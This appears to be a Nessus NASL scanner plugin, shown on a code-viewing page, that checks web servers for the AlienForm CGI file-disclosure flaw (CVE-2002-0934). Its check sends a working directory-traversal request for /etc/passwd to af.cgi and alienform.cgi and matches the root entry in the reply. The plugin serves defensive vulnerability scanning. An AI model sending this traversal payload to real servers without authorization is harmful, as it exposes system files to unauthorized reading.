📄 alienform.nasl
字号:
## This script was written by Andrew Hintz ( http://guh.nu )# and is based on code writen by Renaud Deraison## Script audit and contributions from Carmichael Security <http://www.carmichaelsecurity.com># Erik Anderson <eanders@carmichaelsecurity.com># Added BugtraqID and CAN## See the Nessus Scripts License for details#if(description){ script_id(11027); script_bugtraq_id(4983); script_version("$Revision: 38 $"); script_cve_id("CVE-2002-0934"); name["english"] = "AlienForm CGI script"; script_name(english:name["english"]); desc["english"] = "The AlienForm CGI script allows an attackerto view any file on the target computer, append arbitrary data to an existing file, and write arbitrary data to a new file.The AlienForm CGI script is installed as either af.cgi oralienform.cgiFor more details, please see:http://online.securityfocus.com/archive/1/276248/2002-06-08/2002-06-14/0Solution : Disable AlienFormRisk factor : High"; script_description(english:desc["english"]); summary["english"] = "Checks if the AlienForm CGI script is vulnerable"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2002 Andrew Hintz (http://guh.nu)"); family["english"] = "CGI abuses"; script_family(english:family["english"]); script_dependencie("http_version.nasl"); script_require_ports("Services/www", 80); script_exclude_keys("Settings/disable_cgi_scanning"); exit(0);}## The script code starts here#include("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if(!get_port_state(port))exit(0);foreach dir (cgi_dirs()){afcgi[0] = "af.cgi";afcgi[1] = "alienform.cgi";for(d=0;afcgi[d];d=d+1){ req = string(dir, "/", afcgi[d], "?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd"); req = http_get(item:req, port:port); result = http_keepalive_send_recv(port:port, data:req); if(result == NULL)exit(0); if(egrep(pattern:"root:.*:0:[01]:.*", string:result)){ security_hole(port); exit(0); }}}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -